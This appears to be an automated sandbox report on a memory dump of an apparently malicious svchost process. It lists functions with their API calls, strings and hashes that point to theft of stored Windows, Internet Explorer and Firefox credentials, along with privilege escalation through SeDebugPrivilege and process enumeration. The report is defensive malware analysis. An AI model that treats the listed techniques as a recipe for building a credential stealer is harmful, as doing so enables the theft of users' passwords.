I, xrefs: 000000018007CC6F
K, xrefs: 000000018007CC83
[, xrefs: 000000018007CC54
{, xrefs: 000000018007CCA1
M, xrefs: 000000018007CC79
|, xrefs: 000000018007CCB0
d, xrefs: 000000018007CC7E
v, xrefs: 000000018007CC97
m, xrefs: 000000018007CC92
z, xrefs: 000000018007CCBA
t, xrefs: 000000018007CC88
i, xrefs: 000000018007CCB5
firefox, xrefs: 000000018007CC2F
q, xrefs: 000000018007CC8D
|, xrefs: 000000018007CCBF
W, xrefs: 000000018007CC5B
U, xrefs: 000000018007CCC4
\, xrefs: 000000018007CC65
d, xrefs: 000000018007CCA6
"C:\Program Files (x86)\Mozilla Firefox, xrefs: 000000018007C9B5
[, xrefs: 000000018007CCAB
Z, xrefs: 000000018007CC74
|, xrefs: 000000018007CC9C

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: CloseOpen$EnumQueryValue
String ID: "C:\Program Files (x86)\Mozilla Firefox$I$K$M$N$U$W$Z$[$[$\$_$d$d$firefox$i$m$m$q$t$v$z${$|$|$|
API String ID: 1729155201-1460036693
Opcode ID: f42302eba2d4ab4a27632653d30550bca48b9a546cb7b6c6b7ced092037dab4d
Instruction ID: ae20b106f7a53041454a05d88243bac7b0ea1ff8c835b7ff54654094f7178252
Opcode Fuzzy Hash: f42302eba2d4ab4a27632653d30550bca48b9a546cb7b6c6b7ced092037dab4d
Instruction Fuzzy Hash: AAF16D2260D2C08EE352CB7CA48479EBFB0E7A634CF144159E7C85BA5AC66DD609CF16

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180096B40, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 102
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CredEnumerateW.ADVAPI32 ref: 0000000180096BFD
AuditFree.ADVAPI32 ref: 0000000180096C41
RegOpenKeyExW.ADVAPI32 ref: 0000000180096C6A
RegEnumValueW.ADVAPI32 ref: 0000000180096CB3
RegCloseKey.ADVAPI32 ref: 0000000180096CF8

Strings

Microsoft_WinInet_*, xrefs: 0000000180096BEC
abe2869f-9b47-4cd9-a358-c22904dba7f7, xrefs: 0000000180096B98
Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0000000180096C5C
J, xrefs: 0000000180096BB9

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: AuditCloseCredEnumEnumerateFreeOpenValue
String ID: J$Microsoft_WinInet_*$Software\Microsoft\Internet Explorer\IntelliForms\Storage2$abe2869f-9b47-4cd9-a358-c22904dba7f7
API String ID: 3981057823-3171160697
Opcode ID: 92f949f6dd47f00bdfc0e53b66831a87d0434a06670dfb306b90deea3333e37d
Instruction ID: 1a0d201242bc5f94aee00c1161d265736dfe2b3d0f78ef5b7838d7809109fb30
Opcode Fuzzy Hash: 92f949f6dd47f00bdfc0e53b66831a87d0434a06670dfb306b90deea3333e37d
Instruction Fuzzy Hash: C9513072604B8999EB61CF60E4843DA77B4F748388F508225EA9D47B79DF78C24DC740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800949E0, Relevance: 15.5, APIs: 10, Instructions: 472
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 0000000180094A81
GetProcAddress.KERNEL32 ref: 0000000180094B16
GetProcAddress.KERNEL32 ref: 0000000180094BDB
GetProcAddress.KERNEL32 ref: 0000000180094C6A
GetProcAddress.KERNEL32 ref: 0000000180094CEA
GetProcAddress.KERNEL32 ref: 0000000180094D61
GetProcAddress.KERNEL32 ref: 0000000180094DD8
GetProcAddress.KERNEL32 ref: 0000000180094E78
GetProcAddress.KERNEL32 ref: 0000000180094F5E
GetProcAddress.KERNEL32 ref: 0000000180094FC5

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 359f661757ccb4fba0d60f6a936caa469657e66e0b9193290d5bc9bbbe42d484
Instruction ID: 6f4d56f10469b449fe33d989acce737021761f11b43621ce6126356e2ba2612e
Opcode Fuzzy Hash: 359f661757ccb4fba0d60f6a936caa469657e66e0b9193290d5bc9bbbe42d484
Instruction Fuzzy Hash: A3324423B0D6C0CDF352CBB884487DD3FB1932638CF084199EB856BA4FD6A99619C765

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800B1870, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00000001800A8971), ref: 00000001800B1876
LookupPrivilegeValueA.ADVAPI32(?,?,?,?,?,?,?,00000001800A8971), ref: 00000001800B18E2
AdjustTokenPrivileges.KERNELBASE ref: 00000001800B1941
CloseHandle.KERNEL32 ref: 00000001800B196F

Strings

SeDebugPrivilege, xrefs: 00000001800B18DB

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: AdjustCloseCurrentHandleLookupPrivilegePrivilegesProcessTokenValue
String ID: SeDebugPrivilege
API String ID: 1569164952-2896544425
Opcode ID: b9528c5758591b0bb7981b42b7c49b5772f68875b637d60ac8829e583456d477
Instruction ID: ceecd1e42d112654bd024c4800504c144253da3eb941affcdad525683fa79278
Opcode Fuzzy Hash: b9528c5758591b0bb7981b42b7c49b5772f68875b637d60ac8829e583456d477
Instruction Fuzzy Hash: B321A17131AB4446FF9A8B51E025BEA6390AB8D7D4F888529AD4E07BC5DF7DC6098700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800B4C7C, Relevance: 6.0, APIs: 4, Instructions: 40timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001800B4839), ref: 00000001800B4CA9
GetCurrentThreadId.KERNEL32(?,?,?,00000001800B4839), ref: 00000001800B4CB7
GetCurrentProcessId.KERNEL32(?,?,?,00000001800B4839), ref: 00000001800B4CC3
RtlQueryPerformanceCounter.NTDLL(?,?,?,00000001800B4839), ref: 00000001800B4CD3

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: fd42106d15b5b03c54fed741e258fac8cd6483d7a87671bc92b1cbcc5d4e232b
Instruction ID: 6508781b52a9ebaf32094c00823428c644b1b5d2c4dd60edda53b9f993044f86
Opcode Fuzzy Hash: fd42106d15b5b03c54fed741e258fac8cd6483d7a87671bc92b1cbcc5d4e232b
Instruction Fuzzy Hash: 2F112E36704F458AEB51CF65E85439933A4F71E768F045B21FA9D47B94DF38C2A88390

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180096D20, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 482libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180097784), ref: 0000000180096D48

Strings

vaultcli.dll, xrefs: 0000000180096D3F

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID: vaultcli.dll
API String ID: 1029625771-1893742281
Opcode ID: 176379a3baefe187ceb3db3fde7f4213976aa60ef9cac03a342e0bdeb7eefdd2
Instruction ID: a1987c51eb29a6be4002113d31b2bc5aa257a61cec417d37947a257cd8e5ee21
Opcode Fuzzy Hash: 176379a3baefe187ceb3db3fde7f4213976aa60ef9cac03a342e0bdeb7eefdd2
Instruction Fuzzy Hash: 002251237192C08EE752CFB890447DD3FB0972938CF488459EE85ABB4BCA65C71AC765

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800701C0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 201COMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,000000018000F141,?,?,?,000000018000F245), ref: 0000000180070388

Strings

gfff, xrefs: 0000000180070450

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: InfoSystem
String ID: gfff
API String ID: 31276548-1553575800
Opcode ID: 033ffa1392f66801c5d4caebc3484f0098714e80c63b2c876846c32fb08a22a2
Instruction ID: 8a3d273364dadd28cab4f1b496729e12bf234d9588828029ecc0c87a1ed5ab00
Opcode Fuzzy Hash: 033ffa1392f66801c5d4caebc3484f0098714e80c63b2c876846c32fb08a22a2
Instruction Fuzzy Hash: CCA13A71315A0DC6FAD7DB15E9583E432E1EB4CBA0F64C12AA9C9826A5DF3DC74D8B00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800B1758, Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 00000001800B17B9

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: a8e393a506681f23d68416ca165f59911708bc732e2ac318b8b43f1ccff892ff
Instruction ID: 447a10e616268ecfc5ba68e4968931f4e713dfcbdff5e7485336c0b075e5e3aa
Opcode Fuzzy Hash: a8e393a506681f23d68416ca165f59911708bc732e2ac318b8b43f1ccff892ff
Instruction Fuzzy Hash: 6021D5327281848BE79ACB25E855F8E3765F359340F459125EE1ACBB85CB39DA49CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018007A320, Relevance: 121.1, APIs: 6, Strings: 63, Instructions: 386
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCrackUrlA.WININET ref: 000000018007A3AE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018007A97A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018007A980
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018007A986
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018007A98C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018007A992

Strings

., xrefs: 000000018007A6EB
u, xrefs: 000000018007A7B7
i, xrefs: 000000018007A7E9
@, xrefs: 000000018007A7FD
u, xrefs: 000000018007A6A0
e, xrefs: 000000018007A713
f, xrefs: 000000018007A6FF
v, xrefs: 000000018007A6F0
e, xrefs: 000000018007A71D
j, xrefs: 000000018007A691
g, xrefs: 000000018007A807
r, xrefs: 000000018007A79E
x, xrefs: 000000018007A6C8
d, xrefs: 000000018007A696
2, xrefs: 000000018007A7E4
d, xrefs: 000000018007A709
%, xrefs: 000000018007A802
k, xrefs: 000000018007A7D0
q, xrefs: 000000018007A687
s, xrefs: 000000018007A816
n, xrefs: 000000018007A7B2
p, xrefs: 000000018007A6DC
n, xrefs: 000000018007A6E6
., xrefs: 000000018007A6D2
x, xrefs: 000000018007A6C3
y, xrefs: 000000018007A7C6
w, xrefs: 000000018007A7DA
r, xrefs: 000000018007A7DF
w, xrefs: 000000018007A7C1
f, xrefs: 000000018007A7F8
z, xrefs: 000000018007A811
t, xrefs: 000000018007A7D5
4, xrefs: 000000018007A7CB
f, xrefs: 000000018007A718
j, xrefs: 000000018007A6A5
p, xrefs: 000000018007A6AA
z, xrefs: 000000018007A7A3
b, xrefs: 000000018007A67D
w, xrefs: 000000018007A825
i, xrefs: 000000018007A81B
m, xrefs: 000000018007A68C
o, xrefs: 000000018007A6AF
f, xrefs: 000000018007A7EE
y, xrefs: 000000018007A7F3
y, xrefs: 000000018007A6B9
y, xrefs: 000000018007A7AD
~, xrefs: 000000018007A82A
q, xrefs: 000000018007A7A8
o, xrefs: 000000018007A704
x, xrefs: 000000018007A6CD
p, xrefs: 000000018007A70E
g, xrefs: 000000018007A6D7
., xrefs: 000000018007A6BE
b, xrefs: 000000018007A69B
f, xrefs: 000000018007A7BC
t, xrefs: 000000018007A80C
s, xrefs: 000000018007A6F5
s, xrefs: 000000018007A6E1
0, xrefs: 000000018007A6B4
f, xrefs: 000000018007A820
B, xrefs: 000000018007A82F
q, xrefs: 000000018007A682
m, xrefs: 000000018007A6FA

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CrackInternet
String ID: %$.$.$.$0$2$4$@$B$b$b$d$d$e$e$f$f$f$f$f$f$g$g$i$i$j$j$k$m$m$n$n$o$o$p$p$p$q$q$q$r$r$s$s$s$t$t$u$u$v$w$w$w$x$x$x$y$y$y$y$z$z$~
API String ID: 2632892460-359811758
Opcode ID: 25339a5c4624c74fd2b4fcc74157dd94d604441d02b8d1693085434b8ed15372
Instruction ID: fd756815a6bc98808c97d59075acb31509a13a2a6e60b6754d0edf03b8189651
Opcode Fuzzy Hash: 25339a5c4624c74fd2b4fcc74157dd94d604441d02b8d1693085434b8ed15372
Instruction Fuzzy Hash: D802A36260C7C488FB62CB38D4443DE6BA1E396788F548115E7D90BA9ADF7EC258C711

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180074890, Relevance: 73.6, APIs: 1, Strings: 41, Instructions: 140
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

6, xrefs: 0000000180074294
N, xrefs: 000000018007444F
B, xrefs: 0000000180074264
Q, xrefs: 0000000180074477
_, xrefs: 000000018007445E
X, xrefs: 00000001800742EA
b, xrefs: 000000018007430D
J, xrefs: 0000000180074463
c, xrefs: 00000001800742F4
!, xrefs: 00000001800742F9
u, xrefs: 0000000180074308
D$C2, xrefs: 0000000180074943
\*, xrefs: 000000018007492A
., xrefs: 0000000180074516
9, xrefs: 0000000180074502
_, xrefs: 0000000180074468
#, xrefs: 0000000180074299
b, xrefs: 0000000180074445
3, xrefs: 00000001800744F3
f, xrefs: 00000001800742EF
3, xrefs: 000000018007451B
,, xrefs: 0000000180074280
#, xrefs: 000000018007428F
z, xrefs: 0000000180074459
b, xrefs: 0000000180074285
b, xrefs: 000000018007446D
N, xrefs: 0000000180074454
b, xrefs: 0000000180074303
E, xrefs: 00000001800742FE
\, xrefs: 00000001800744DC
_, xrefs: 0000000180074481
>, xrefs: 000000018007443D
r, xrefs: 0000000180074472
0, xrefs: 00000001800744FD
;, xrefs: 00000001800744F8
4, xrefs: 0000000180074511
%, xrefs: 0000000180074276
R, xrefs: 0000000180074486
+, xrefs: 000000018007427B
3, xrefs: 00000001800744EE
], xrefs: 000000018007447C

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: FolderPathSpecial
String ID: !$#$#$%$+$,$.$0$3$3$3$4$6$9$;$>$B$D$C2$E$J$N$N$Q$R$X$\$\*$]$_$_$_$b$b$b$b$b$c$f$r$u$z
API String ID: 994120019-273033004
Opcode ID: f58e3eb32af2c2fc9b034810c07d1c5c189449f6e2e5d6f1abd527c9677f34d4
Instruction ID: 945802b07bbd0c942fa0801c1f85c120cc8dc4af54c51096ea5e9bad799520a5
Opcode Fuzzy Hash: f58e3eb32af2c2fc9b034810c07d1c5c189449f6e2e5d6f1abd527c9677f34d4
Instruction Fuzzy Hash: D951CF333046C895EBA18B64E4403DE67A1F3897E4F448325FAAD4BAD9DFADC649C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180078B10, Relevance: 47.3, APIs: 3, Strings: 24, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDeleteCriticalSection.NTDLL ref: 0000000180078B33
RtlDeleteCriticalSection.NTDLL ref: 0000000180078B4D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180078BBD

Strings

Q, xrefs: 0000000180079017
J, xrefs: 00000001800790B2
K, xrefs: 000000018007901C
V, xrefs: 00000001800790B7
j, xrefs: 00000001800792ED
Z, xrefs: 00000001800790C1
E, xrefs: 0000000180079383
U, xrefs: 0000000180079392
k, xrefs: 0000000180078FC9
y, xrefs: 0000000180079306
~, xrefs: 000000018007930B
;, xrefs: 0000000180078FD1
K, xrefs: 0000000180079053
u, xrefs: 0000000180079301
Y, xrefs: 00000001800790BC
j, xrefs: 00000001800792F7
w, xrefs: 00000001800792E8
%, xrefs: 00000001800792DE
f, xrefs: 00000001800792E3
Q, xrefs: 0000000180079388
r, xrefs: 00000001800792FC
%, xrefs: 00000001800792F2
K, xrefs: 0000000180078FFE
T, xrefs: 000000018007938D

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: CriticalDeleteSection$_invalid_parameter_noinfo_noreturn
String ID: %$%$;$E$J$K$K$K$Q$Q$T$U$V$Y$Z$f$j$j$k$r$u$w$y$~
API String ID: 2934537544-3197835714
Opcode ID: 5f36005c2dfae11d140266df407125dd0f1b57866d71b472b022a669b85484ab
Instruction ID: 8bb76c076466b0a1529f5fed8a604f6e305af5dff2ca052a33e323c6d1ea0eba
Opcode Fuzzy Hash: 5f36005c2dfae11d140266df407125dd0f1b57866d71b472b022a669b85484ab
Instruction Fuzzy Hash: CF1182F2341A8C41FB86DF24D4683E83361E71DBA5F48C614DB990A6D6CF6DC68C8380

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800B1A50, Relevance: 28.1, APIs: 6, Strings: 10, Instructions: 105
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00000001800B1A9E
Process32First.KERNEL32 ref: 00000001800B1ADF
Process32Next.KERNEL32 ref: 00000001800B1AF6
OpenProcess.KERNEL32 ref: 00000001800B1B1E
StrStrIA.SHLWAPI ref: 00000001800B1B92
CloseHandle.KERNEL32 ref: 00000001800B1BB8

Strings

p, xrefs: 00000001800B1B2C
9, xrefs: 00000001800B1B57
p, xrefs: 00000001800B1B5C
z, xrefs: 00000001800B1B43
{, xrefs: 00000001800B1B39
p, xrefs: 00000001800B1B4D
p, xrefs: 00000001800B1B66
w, xrefs: 00000001800B1B3E
}, xrefs: 00000001800B1B48
}, xrefs: 00000001800B1B52

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextOpenProcessSnapshotToolhelp32
String ID: 9$p$p$p$p$w$z${$}$}
API String ID: 1181503618-350632768
Opcode ID: b90ebf9bbab615236d2d9b46b54af96066b30faae60f15c5a93906576a9a6eee
Instruction ID: 40f70bfdcb3ba1f1923902a107494fba8288d235b720e30600485355779e750b
Opcode Fuzzy Hash: b90ebf9bbab615236d2d9b46b54af96066b30faae60f15c5a93906576a9a6eee
Instruction Fuzzy Hash: 8541E63230DA8489E7B28B25A4147AE6B91E38D7D4F488364EA9D03BD4DF7CD649CB11

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000ACC4, Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 96
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,?,00000000,000000018000AE4C,?,?,?,000000018007BC44), ref: 000000018000ADE8

Strings

user32.dll, xrefs: 000000018000AD3E
advapi32.dll, xrefs: 000000018000AD47
nss3.dll, xrefs: 000000018000AD7F
ws2_32.dll, xrefs: 000000018000AD35
ntdll.dll, xrefs: 000000018000AD2C
kernel32.dll, xrefs: 000000018000AD50
shell32.dll, xrefs: 000000018000AD59
shlwapi.dll, xrefs: 000000018000AD76
wininet.dll, xrefs: 000000018000AD91
urlmon.dll, xrefs: 000000018000AD88

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID: advapi32.dll$kernel32.dll$nss3.dll$ntdll.dll$shell32.dll$shlwapi.dll$urlmon.dll$user32.dll$wininet.dll$ws2_32.dll
API String ID: 1029625771-711362201
Opcode ID: 2a2c0d443b59e2e51ae765405f1f8cce8893ed017fda495fd7e315ad58f34d26
Instruction ID: 2b7134a7573e105e2d7f9e527ea1f0bcd5a3f2486ceb4e47669d4ba4fd8348a8
Opcode Fuzzy Hash: 2a2c0d443b59e2e51ae765405f1f8cce8893ed017fda495fd7e315ad58f34d26
Instruction Fuzzy Hash: 2F312C3120E50C99FDEBC72699547E93251A79F3C1E98C526B50712EA4EE28CF8D9300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800B1980, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 60
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00000001800B198F
OpenProcessToken.ADVAPI32 ref: 00000001800B19A1
GetTokenInformation.ADVAPI32 ref: 00000001800B19CC
GetLastError.KERNEL32 ref: 00000001800B19D6
GlobalAlloc.KERNEL32 ref: 00000001800B19E9
GetTokenInformation.ADVAPI32 ref: 00000001800B1A08
ConvertSidToStringSidW.ADVAPI32 ref: 00000001800B1A1E
GlobalFree.KERNEL32 ref: 00000001800B1A40

Strings

S-1-5-18, xrefs: 00000001800B1A2C

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: Token$GlobalInformationProcess$AllocConvertCurrentErrorFreeLastOpenString
String ID: S-1-5-18
API String ID: 857934279-4289277601
Opcode ID: b1bf5b6656f7ac7cc8b445ab3d43a09e2c5fa62c54753f5534c4e31a36bf6975
Instruction ID: bc541a86c160554eb3c015464b1cd222459166ba6f2c19b25116ecee39e88ee5
Opcode Fuzzy Hash: b1bf5b6656f7ac7cc8b445ab3d43a09e2c5fa62c54753f5534c4e31a36bf6975
Instruction Fuzzy Hash: 58216A36614A488EFBA28F22D8547DD23A4FB4DBD9F448215FE4E43A58DF38C64D8710

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180013828, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 240
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000020), ref: 00000001800139F3

Strings

winOpen, xrefs: 0000000180013A35
%s at line %d of [%.10s], xrefs: 0000000180013AAB
cannot open file, xrefs: 0000000180013AA2
psow, xrefs: 0000000180013B1A
9501e22dfeebdcefa783575e47c60b514d7c2e0cad73b2a496c0bc4b680900a8, xrefs: 0000000180013A90

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: CreateFile
String ID: %s at line %d of [%.10s]$9501e22dfeebdcefa783575e47c60b514d7c2e0cad73b2a496c0bc4b680900a8$cannot open file$psow$winOpen
API String ID: 823142352-1782000241
Opcode ID: ab7ccd4069f1f1d76e138a0572d8fddb82c9da350596917f6e248f2e94dc8949
